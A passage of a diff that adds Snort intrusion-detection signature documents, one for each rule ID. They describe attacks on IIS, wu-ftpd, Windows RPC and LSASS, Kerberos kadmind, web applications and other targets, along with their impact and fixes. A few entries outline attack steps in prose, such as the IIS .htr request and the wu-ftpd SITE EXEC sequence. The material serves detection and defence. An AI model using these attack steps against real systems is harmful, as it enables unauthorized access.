+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using REDAXO
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/910.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+910
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2954.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2954
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2547.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2547
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with the web interface support for the HP JetAdmin printer.
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code as root 
+on a vulnerable server.
+
+--
+Detailed Information:
+The HP Web JetAdmin provides a web interface for the administration of the HP
+Web JetAdmin printer.  A vulnerability exists that allows the uploading
+of unauthorized files using the script 
+/plugins/hpjwja/script/devices_update_printer_fw_upload.hts.  This capability
+was included to allow the upload of legitimate files, such as firmware updates,
+by an authorized administrator.  However, there is no file validation on the
+uploaded file, allowing the upload of any random file.  An attacker can upload
+a file with a .hts extension that subsequently can be executed when the
+attacker accesses the file using a web browser.
+
+--
+Affected Systems:
+HP Web JetAdmin 7.2.
+
+--
+Attack Scenarios:
+An attacker can create upload and execute a malicious file on a vulnerable server. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+An authorized administrator who uploads a file from an IP address outside the trusted
+network will cause a false positive alert.
+
+--
+False Negatives:
+The default HP Web JetAdmin port is 8000.  If an administrator selects a different port
+on which to run the web interface, no alert will be detected.  In that case, the rule
+should be altered to reflect the port on which the web interface runs.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software or apply the appropriate patch
+when it becomes available.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/9971
+
+--
--- /dev/null
+++ b/doc/signatures/1899.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 1899
+
+--
+Summary:
+This event is generated when an attempt is made to exploit 
+vulnerable versions of the Kerberos version 4 administration daemon 
+(kadmind).
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code or gain unauthorized access to the target host along with other hosts in the kerberos realm.
+
+--
+Detailed Information:
+kadmind is used to administer a Kerberos database on the master key distribution center (KDC) of a kerberos realm.
+
+A buffer overflow condition exists in kadmind4 such that when the daemon parses a length value in an administration request the attacker can gain the ability to execute arbitrary code with the privileges of the user running the daemon, usually root.
+
+Authentication is not required to cause the overflow.
+
+Affected Systems:
+	Multiple vendors using kadmind version 4
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-29.html
+http://www.kb.cert.org/vuls/id/875073
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1235
+
+--
--- /dev/null
+++ b/doc/signatures/112-2.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+112-2
+
+--
+Summary:
+This event is generated when the pre-processor spp_arpspoof detects
+network traffic that may constitute an attack. Specifically an
+etherframe arp mismatch was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_arpspoof pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000654.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000654
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "text" parameter in the "index.php" script used 
+by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/852.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+852
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3313.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3313
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/111-17.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+111-17
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an IDS evasion attempt.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected a TCP session that contains
+retransimitted data without the necessary retransmission request. This
+may be an attempt to evade any monitoring IDS.
+
+It may be possible for an attacker to send multiple small packets to a
+host then disguise an actual attack in a retransmitted packet to that
+same host.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker could cause a host to send multiple acknowledgement packets
+then supply one large malicious packet to the host disguised as a
+retransmission of data.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000746.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000746
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Randshop" application running on a webserver. Access to the file "header.inc.php" using a remote file being passed as the "dateiPfad" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "dateiPfad" parameter in the "header.inc.php" script used by the "Randshop" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Randshop
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2261.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2261
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1021.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+Sid:
+1021
+
+--
+
+Summary:
+This event is generated when an attempt is made to retrieve file
+contents by exploiting a vulnerability in Microsoft Internet 
+Information Server (IIS) ISAPI component.
+
+--
+Impact:
+Information Disclosure.
+
+--
+Detailed Information:
+Default installations of IIS 4.0 and IIS 5.0 contain a vulnerability in
+ISM.DLL that can allow an attacker to retrieve the contents of
+files on the system.  This could be used to retrieve web application
+source code or the contents of other sensitive files.
+
+--
+Affected Systems:
+	Microsoft IIS 4.0 and 5.0
+	Multiple vendor implementations of IIS.
+
+--
+Attack Scenarios:
+The attacker sends a URL containing the file to be retrieved (without the
+extension), followed by approximately 230 "%20" (ascii space) characters 
+followed by ".htr".
+
+Note: This attempt can only be performed once. The server must be
+restarted to make another sucessful request.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Check server logs for signs of compromise.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE:   CAN-2000-0457
+Bugtraq:  BID 1193
+
+--
--- /dev/null
+++ b/doc/signatures/344.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+
+344
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a 
+vulnerability in Wu-ftpd.
+
+--
+Impact:
+
+Serious. Full system compromise is possible.
+
+--
+Detailed Information:
+Some versions of Wu-ftpd contain an exploitable vulnerability in SITE 
+EXEC command, which can trigger a buffer overflow enabling an attacker 
+to gain root privileges. Anonymous access is enough for this exploit to 
+work.
+
+--
+Affected Systems:
+
+	Any version of Linux running wu-ftpd 2.6.0 and lower
+
+--
+Attack Scenarios:
+An attacker tries to connect to the server on port 21 anonymously. Then 
+he creates special directories using the MKD (make directory) command, 
+and then change its current FTP path into them using the CWD (change 
+current directory) command followed by a SITE EXEC on that directory. 
+
+
+--
+Ease of Attack:
+
+Simple. Exploit scripts are available.
+
+--
+False Positives:
+
+None known.
+
+--
+False Negatives:
+
+None known.
+
+--
+Corrective Action:
+Disable anonymous FTP access to your site.
+
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2000-13.html
+
+--
--- /dev/null
+++ b/doc/signatures/2514.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2514
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1321.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid: 1321
+
+--
+Summary:
+This event is generated when packets on the network have the Time To 
+Live (TTL) set to 0.
+
+--
+Impact:
+Improper use of IP multicasting by an application causing anomalous 
+behaviour on the network. This may have a detrimental effect on network 
+devices.
+
+--
+Detailed Information:
+Under normal circumstances the TTL should not be 0.
+
+This may be the result of a poorly designed application sending a TTL of 0 using Winsock.
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+--
+Affected Systems:
+	Windows 95
+	Windows NT 3.5 and 3.51
+
+--
+Attack Scenarios:
+The application may be using a flaw in some versions of Winsock that 
+allow multicast packets to have a TTL of 0.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor fixes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb\;EN-US\;q138268
+http://support.microsoft.com/default.aspx?scid=kb;EN-US;131978
+
+--
--- /dev/null
+++ b/doc/signatures/1208.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1208
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1439.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1439
+
+--
+Summary:
+This event is generated when network traffic indicating the use of a
+multimedia application is detected.
+
+--
+Impact:
+This may be a violation of corporate policy since these applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation.
+
+--
+Detailed Information:
+Multimedia client applications can be used to view movies and listen to
+music files. Some also include file sharing facilities. Use of these
+programs may constitute a violation of company policy.
+
+Clients may also contain vulnerabilities that can give an attacker an
+attack vector for delivering Trojan horse programs and viruses.
+
+--
+Affected Systems:
+	All systems running multimedia applications
+
+--
+Attack Scenarios:
+A user can download files from a source external to the protected
+network that may contain malicious code hidden in the file giving an
+attacker the opportunity to gain access to a host inside the protected
+network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Content type reference:
+http://reliableanswers.com/contenttype/CType.asp?page=6&ord=
+
+--
--- /dev/null
+++ b/doc/signatures/2855.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2855
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure remove_master_databases
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/712.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+712
+
+--
+Summary:
+This event is generated when an attempt is made to set an environment
+variable in a Telnet session to a server.
+
+--
+Impact:
+Unauthorized superuser access.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use the environment
+variable ld_library_path in a Telnet session.
+
+--
+Affected Systems:
+	Telnet servers.
+
+--
+Attack Scenarios:
+An attacker can attempt to set the environment variable ld_library_path
+and then attempt to exploit a known vulnerability in some SunOS based
+systems.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use ssh as an alternative to Telnet
+
+Block inbound telnet access if it is not required.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/43
+
+--
--- /dev/null
+++ b/doc/signatures/2925.txt
@@ -0,0 +1,68 @@
+Rule: 
+
+--
+Sid: 
+2925
+
+-- 
+Summary: 
+This event is generated when an image fitting the profile of a web bug
+has been detected in network traffic.
+
+-- 
+
+Impact: 
+Information disclosure.
+
+--
+Detailed Information:
+Web bugs are 1x1 pixel image files that are found in web pages or HTML
+email. These are often used to monitor and track a users activity on the
+web. Information such as the browsers IP address, cookie information,
+time, browser version and other user identifiable charateristics can be
+collected using web bugs.
+
+This rule identifies an image that conforms to the usual size and format
+of a web bug.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios: 
+An attacker can use this type of image in an HTML email or on a web
+page to gather information about the host and user. Since these images
+can be not only small but transparent, they are almost undetectable in
+HTML pages.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Disallow the use of HTML email
+
+Use a web proxy server to strip all web bug images from server
+responses.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/185.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+185
+
+--
+Summary:
+CDK is a Trojan Horse offering the attacker control of the victim host. 
+This event is generated when an attacker connects to a victim server.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Restore a previously known good copy of the registry.
+
+A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Original rule written by Paul Bobby <paul.bobby@lmco.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS263
+
+--
--- /dev/null
+++ b/doc/signatures/623.txt
@@ -0,0 +1,67 @@
+Rule:
+--
+Sid:
+623
+--
+Summary:
+A tcp packet with none of it's control bits set was detected.
+
+--
+Impact:
+Information regarding firewall rulesets, open/closed ports, ACLs, and
+possibly even OS type is possible.  This technique can also be used to
+bypass certain firewalls or traffic filtering/shaping devices.
+
+--
+Detailed Information:
+A tcp packet with none of it's control bits (URG, ACK, PSH, RST, SYN,
+FIN) was detected.  Additionally, both the sequence number and
+acknowledgement number were set to 0.  An open port will generally not
+respond at all, whereas a closed port will generally respond with an
+ACK RST.  The particular response varies between operating systems,
+and is also governed by any filtering that may be done between the two
+hosts.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of information gathering leading up to another (more directed)
+attack, an attacker may attempt to figure out what ports are
+open/closed on a remote machine.
+
+--
+Ease of Attack:
+Intermediate.  To initiate an attack of this type, an attacker either
+needs a tool that can send tcp packets with no control bits  set or
+the ability to craft their own packets.  The former is easy, the later
+requires a more advanced skillset.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Determine if this particular port would have responded as being open
+or closed.  If open, watch for more attacks on this particular service
+or from the remote machine that sent the packet.  If closed, simply
+watch for more traffic from this host.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1023.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1023
+
+--
+Summary:
+This event is generated when an attempt is made to access the msadcs.dll file, which provides an interface to Remote Data Services (RDS).
+
+--
+Impact:
+Information gathering or remote access. This attack may allow disclosure of file contents or may allow remote access to the vulnerable server. 
+
+--
+Detailed Information:
